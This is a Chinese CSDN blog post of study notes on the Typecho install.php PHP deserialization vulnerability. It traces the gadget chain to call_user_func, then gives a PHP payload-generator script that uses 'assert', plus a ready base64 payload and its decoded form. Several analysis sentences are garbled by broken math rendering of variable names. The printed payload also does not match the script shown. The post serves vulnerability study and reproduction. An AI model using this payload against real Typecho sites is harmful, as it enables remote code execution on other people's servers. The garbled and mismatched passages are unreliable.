typecho反序列化漏洞学习笔记

最新推荐文章于 2024-01-28 09:06:37 发布
最新推荐文章于 2024-01-28 09:06:37 发布
阅读量733 收藏
点赞数
分类专栏: 渗透测试 文章标签: 信息安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qlqlulu/article/details/113481665
版权

什么是序列化?
百度百科:
将对象的状态信息转换为可以存储或传输形式的过程(字符串)。在序列化期间,对象将其当前的状态写入到临时(内存)或持久性存储区(硬盘)。以后可以通过从存储区中读取或者反序列化对象状态,重新创建状态。
简单来讲,序列化就是把一个对象变成可传输的字符串,可以以特定的格式在进程之间跨平台、安全的进行通信。字符串包括,属性名,属性值,属性类型和该对象对应的类名。
对象的序列化利于对象的 保存和传输 ,也可以让多个文件共享对象。将用户存储到临时或硬盘中(数据库),可以理解为一个拍快照,通常使用非关系型数据库,如redis、 MongodDB等(非关系型数据库一般用来进行缓存数据)
常见的序列化格式:
• 二进制格式
• 字节数组
• json字符串
• xml字符串

直到漏洞在install.php里,所以这里直接看源码。
在源码的第58行开始有哪个判断,分别是get和ip进行判断,如果条件不成立直接退出;
如果get到一个finish并且带上ip相同的referer,条件成立继续执行。
在这里插入图片描述下面就是反序列化点
在第230行
在这里插入图片描述1是传入finish参数,进入以下的语句块。
2这里有两个反序列化点,其中的Typecho_Cookie: :get的意思是,如果存在cookie就取cookie,如果没有就取post;Typrcho_config是cookie的一个key,这里可以直接控制。
3找到反序列化点后,接着查看POP链,这里就是其中一个POR点。
这里需要传入一个finish参数,然后在230行将cookie中的__typecho_config的值通过base64解码之后反序列化。
再往下看两行到232行,这里将 c o n f i g [ ′ a d a p t e r ′ ] 作 为 第 一 个 参 数 传 入 到 T y p e c h o D b ( ) 中 。 config['adapter']作为第一个参数传入到Typecho_Db()中。 config[adapter]TypechoDb()config就是反序列化传来的对象,因此这个参数也是我们可控的。我们跟进一下Typecho_Db()
打开Db.php
在这里插入图片描述在这里插入图片描述
在第114和120看到定义的变量,这里将我们传来的第一个参数做字符串拼接,如果第一个参数是对象的话,那么这里就会调用__toString()方法,那正好,第一个参数是可控的。
接下来寻找__toString方法,找到了一个Typecho_Feed类,寻找是件很痛苦的事,挨个找好难,在同文件夹下的Feed.php下
在这里插入图片描述
在这里插入图片描述
在上图中看到 i t e m [ ′ a u t h o r ′ ] − > s c r e e n N a m e , 如 果 item['author']->screenName,如果 item[author]>screenName,item[‘author’]是一个不能存在screenName属性类的话,那么这里就会调用这个类的__get()魔术方法,说明这个KaTeX parse error: Expected group after '_' at position 38: …screenName属性,并且_̲_get()方法存在危险操作。…content .= ‘dc:creator’ . htmlspecialchars($item[‘author’]->screenName) . ‘</dc:creator>’ . self::EOL;发现问题,前面提到__get()用于从不可访问的属性读取数据,foreach遍历时当screenName对象不存在的时候会调用__get(),这就全局搜索有__get()方法的类。
这两种思路是相同的,在Request.php选定代码。
在这里插入图片描述
跟进get()
在这里插入图片描述

t h i s − > p a r a m s 也 可 控 , 而 this->_params也可控,而 this>paramskey正式screenName,因此$value可控。
跟进applyFilter

在这里插入图片描述
可以看到,这里有个call_user_func方法,且 f i l t e r 和 filter和 filtervalue都可控。至此这条pop链基本是构造完了。

看到了call_user_func($filter, $value),这个函数的作用是把第一个参数作为回调函数调用,比如这个例子:

<?php
function barber($type)
{
    echo "You wanted a $type haircut, no problem\n";
}
call_user_func('barber', "mushroom");  //输出You wanted a mushroom haircut, no problem
call_user_func('barber', "shave");  //输出You wanted a shave haircut, no problem
?>

到此为止,利用链基本完整:
install.php中unserialize()内容可控==>install.php实例化了一个Typecho_Db,其中获取适配器名称$adapterName时调用了魔术方法__toString==>Feed.php执行__toString()的时候在获取screenName的时候调用了__get()方法==>Request.php中__get()中调用的get(),其中执行了_applyFilte==> Request.php中的_applyFilter()中使用了call_user_func(),该回调函数导致漏洞触发。
0x02 漏洞利用
payload如下:

<?php
class Typecho_Feed
{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;
public function __construct()
    {
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title' => '1',
            'content' => '1',
            'link' => '1',
            'date' => 1540996608,
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();
public function __construct(){
        $this->_params['screenName'] = 'phpinfo()';
        $this->_filter[0] = 'assert';
    }
}
$payload = array(
    'adapter' => new Typecho_Feed(),
    'prefix' => 'typecho_'
);
echo base64_encode(serialize($payload));
?>

生成php文件访问它
在这里插入图片描述

会得到payload(base64)
YTo3OntzOjQ6Imhvc3QiO3M6OToibG9jYWxob3N0IjtzOjQ6InVzZXIiO3M6NjoieHh4eHh4IjtzOjc6ImNoYXJzZXQiO3M6NDoidXRmOCI7czo0OiJwb3J0IjtzOjQ6IjMzMDYiO3M6ODoiZGF0YWJhc2UiO3M6NzoidHlwZWNobyI7czo3OiJhZGFwdGVyIjtPOjEyOiJUeXBlY2hvX0ZlZWQiOjM6e3M6MTk6IgBUeXBlY2hvX0ZlZWQAX3R5cGUiO3M6NzoiUlNTIDIuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6NTp7czo0OiJsaW5rIjtzOjE6IjEiO3M6NToidGl0bGUiO3M6MToiMiI7czo0OiJkYXRlIjtpOjE1MDc3MjAyOTg7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO2k6LTE7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo3OiJwaHBpbmZvIjt9fXM6ODoiY2F0ZWdvcnkiO2E6MTp7aTowO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO2k6LTE7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo3OiJwaHBpbmZvIjt9fX19fXM6MTA6ImRhdGVGb3JtYXQiO047fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9

解码后
a:7:{s:4:“host”;s:9:“localhost”;s:4:“user”;s:6:“xxxxxx”;s:7:“charset”;s:4:“utf8”;s:4:“port”;s:4:“3306”;s:8:“database”;s:7:“typecho”;s:7:“adapter”;O:12:“Typecho_Feed”:3:{s:19:“Typecho_Feed_type”;s:7:“RSS
2.0”;s:20:“Typecho_Feed_items”;a:1:{i:0;a:5:{s:4:“link”;s:1:“1”;s:5:“title”;s:1:“2”;s:4:“date”;i:1507720298;s:6:“author”;O:15:“Typecho_Request”:2:{s:24:“Typecho_Request_params”;a:1:{s:10:“screenName”;i:-1;}s:24:“Typecho_Request_filter”;a:1:{i:0;s:7:“phpinfo”;}}s:8:“category”;a:1:{i:0;O:15:“Typecho_Request”:2:{s:24:“Typecho_Request_params”;a:1:{s:10:“screenName”;i:-1;}s:24:“Typecho_Request_filter”;a:1:{i:0;s:7:“phpinfo”;}}}}}s:10:“dateFormat”;N;}s:6:“prefix”;s:8:“typecho_”;}

在这里插入图片描述

Abc_Kimball
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
typecho序列漏洞复现
weixin_44005410的博客
05-21 1959
0x01前言 再杭州西湖线下打AWD的时候web1就是这个漏洞,在这里复现一下,刚好巩固一下前几天学习序列漏洞。 0x02漏洞分析 这是一个由unserialize()导致的一个序列漏洞,全局搜索unserialize(),在install.php的232行发现 <?php $config = unserialize(base64_decode(Typecho_Cookie::...
typecho-1.1-15.5.12-beta.zip
03-17
Typecho 1.1-15.5.12 Beta 版本中的序列漏洞详解》 在IT安全领域,程序的漏洞是开发者和安全专家关注的重点。本文将详细探讨“typecho-1.1-15.5.12-beta.zip”压缩包中的Typecho 1.1版本至15.5.12 Beta版本中...
typecho序列漏洞(详细过程)
qq_61991235的博客
03-13 1785
typecho序列 菜鸡的第一条链子,酌情参考 搭建环境 利用phpstudy+phpstrom搭建环境调试(注意php版本大于5.4) 开始 漏洞起始点 前提:get方法传?finish=1,refer=http://127.0.0.1 若不设置的话exit,程序结束 详细看install.php前面部分的代码 <?php $config = unserialize(base64_decode(Typecho_Cookie::get('__typecho
Typecho-序列漏洞学习
weixin_34279246的博客
04-30 391
目录 Typecho-序列漏洞学习 0x00 前言 0x01 分析过程 0x02 调试 0x03 总结 0xFF 参考 Typecho-序列漏洞学习 0x00 前言 补丁: https://github.com...
Typecho序列漏洞寻找思路
问彡心的博客
08-01 1076
Typecho靶场一次成功的渗透思路,一定不能错过
TypechoCMS序列漏洞(CVE-2018-18753)
m0_57379855的博客
03-12 1347
TypechoCMS序列漏洞(CVE-2018-18753Typecho序列漏洞php-pocpython-poc Typecho序列漏洞 PHP版本:5.4.5nts(PHPStudy) 在数据库新建一个数据库typecho 只要传一个不存在的成员变量,就会触发_get()魔法函数 使用_get()调用applyFilter() call_user_func() 可以执行任意命令,包括写入文件 php-poc python-poc 重点函数 ...
typecho主题模板,typecho后台模板
01-06
标题中的“typecho主题模板,typecho后台模板”指的是Typecho博客系统使用的界面设计和布局样式,即Typecho的前端展示部分。Typecho是一个轻量级的开源博客平台,允许用户自定义主题来改变博客的外观和用户体验。...
typechov漏洞.zip
08-10
2. "typecho_v10_unserialize_exp_fputs.php" - 这个文件名暗示它是一个针对Typecho 1.0版本的序列漏洞的exploit,其中可能使用了`fputs`函数。`fputs`是PHP中的一个函数,用于向文件写入数据,这可能意味着攻击...
精美扁平自适应typecho后台主题Fresh.zip
01-17
精美扁平自适应typecho后台主题Fresh 曾用名:PrettyFresh主题采用了目前最流行的Bootstrap前端开发框架与typecho进行深度适配;主题在继承typecho一贯简单高效风格的同时让其更加贴合现代年轻用户的审美。自适应+...
Typecho博客收费主题,handsome 6.0
06-15
标题中的“Typecho博客收费主题,handsome 6.0”指的是一个专为Typecho博客平台设计的付费主题,版本号为6.0。Typecho是一款开源、轻量级的博客系统,它允许用户通过简单的界面创建和管理自己的博客。"handsome"是这...
Typecho序列漏洞分析
qq_41891666的博客
07-06 1476
0x01 环境准备 首先 git clone 到本地,然后phpstorm 打开, git reset hard 到漏洞修复之前的commit 0x02 审计 首先在install.php 开头就做出了两个判断,需要finish 参数以及refer头要是本站的值 核心漏洞处: 第一行直接序列Typecho_Cookie::get(’__typecho_config’),没有进行任何过滤 跟进Typecho_Cookie::get() 函数 发现此函数是用来取cookie 中的值的,但是如果对应
记一次typecho序列漏洞的复现(第一次写poc版)
m0_62100902的博客
06-28 1956
经过一系列的代码审计,终于找到一个可以利用的点,其余的属性全都是写死了的,也就是静态this的调用方式,而这里不是静态的,它可以是别的对象里面去调用这个属性,那么我们可以想到一种魔术方法:__get(),这个魔术方法是当对象中调用不存在的属性时候会自动去调用这个魔术方法,那么我们需要去找到一个既有__get()魔术方法的又没有screenName这个属性的对象(这里终于来点感觉了),继续在代码审计工具里面找__get()说一说我的个人理解吧。举个例子,php与java之间是如何相互传输的呢?
typecho老版本的序列研究
蚁景网安学院
11-21 355
虽然自己也水了些CVE,但是并没有自己满意的、漂亮的漏洞利用链,今天呢主要是自己还没审出过序列漏洞,所以找了typecho老版本来审一下。正文在install.php第246行会序...
漏洞复现篇——Typecho序列漏洞
爱国小白帽
03-03 5170
实验环境: PHPstudy 火狐浏览器 Typecho 填好数据库密码和你的登录密码就可以了 安装时会报错,因为无法自动创建数据库,需要使用CREATE DATABASE typecho default charset utf8;语句手动创建数据库 ...
Typecho代码审计-序列漏洞复现(超详细!!!)
小小小屿屿屿的博客
12-27 2356
本文以Typecho为靶场,通过代码审计,复现了序列漏洞
序列typecho2靶场漏洞-代码审计全过程(超详细)
最新发布
qq_59020256的博客
01-28 1132
php· }
CVE-2018-18753 Typecho 序列漏洞 分析复现
2301_77512689的博客
04-21 415
漏洞概述:typecho 是一款非常简洁快速博客 CMS,前台 install.php 文件存在序列漏洞,通过构造的序列字符串注入可以执行任意 PHP 代码。影响版本:typecho1.0(14.10.10)
Typecho install.php存在的序列漏洞
王三三
11-30 1654
0x00 前言很久没有在安全方面折腾,突然收到“爸爸云”的短信,“您的服务器xxx.xxx.xxx.xxx存在网站后门,为防止黑客进一步入侵,请登录进行查看和处理”。当时正在出差,手头没电脑,草草看了一眼没来得及处理,最近得空研究了研究。常在河边走,哪有不湿鞋,网上已经有该漏洞的详解,仅以此文记录对序列漏洞研究的一个学习过程。0x01 漏洞复现使用工具:1、Firefox浏览器+HackBar插
typecho markdown
08-16
Typecho 中使用 Markdown,你可以通过以下步骤进行设置: 1. 安装 Markdown 插件:首先,你需要安装 Typecho 的 Markdown 插件。你可以在 Typecho 的官方插件市场或开发者社区中找到适合的 Markdown 插件,然后将其下载到 Typecho 的插件目录中(一般是 `usr/plugins` 目录)。 2. 启用 Markdown 插件:在 Typecho 的后台管理界面中,进入「控制台」-「插件」页面,找到已下载的 Markdown 插件,点击「启用」按钮启用该插件。启用后,Typecho 的编辑器将切换为支持 Markdown 语法的编辑器。 3. 编辑文章使用 Markdown:现在你可以在 Typecho 的文章编辑页面中使用 Markdown 语法来编写内容了。Markdown 是一种简单、直观的文本标记语言,可以快速排版和格式文章。 4. 预览和发布文章:在编辑过程中,你可以通过点击编辑器上方的「预览」按钮来查看 Markdown 格式的文章预览效果。当编辑完成后,点击「发布」按钮来将文章保存并发布到你的博客中。 使用 Markdown 可以方便地进行文本排版、插入链接、插入图片、添加代码块等操作,同时也可以提高写作效率。你可以参考 Markdown 的语法规则和常用标记来使用它在 Typecho 中编写博客内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值